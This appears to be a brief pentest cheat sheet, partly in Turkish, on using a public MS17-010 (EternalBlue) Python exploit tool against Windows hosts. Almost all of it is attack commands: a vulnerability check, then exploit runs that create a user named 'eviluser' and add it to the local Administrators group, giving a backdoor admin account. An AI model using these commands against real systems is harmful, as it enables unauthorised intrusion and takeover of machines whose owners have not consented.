# ms17-010 python exploit

[ms17-010](https://github.com/mez0cc/MS17-010-Python) aracını indir.

**check**

```
# python zzz_checker.py -t IP
```

**add user**

```
# python zzz_exploit.py -t IP -c 'net user eviluser Password1 /add'
```

**add user to localgroup**

```
# python zzz_exploit.py -t IP -c 'net localgroup Administrators eviluser /add'
```
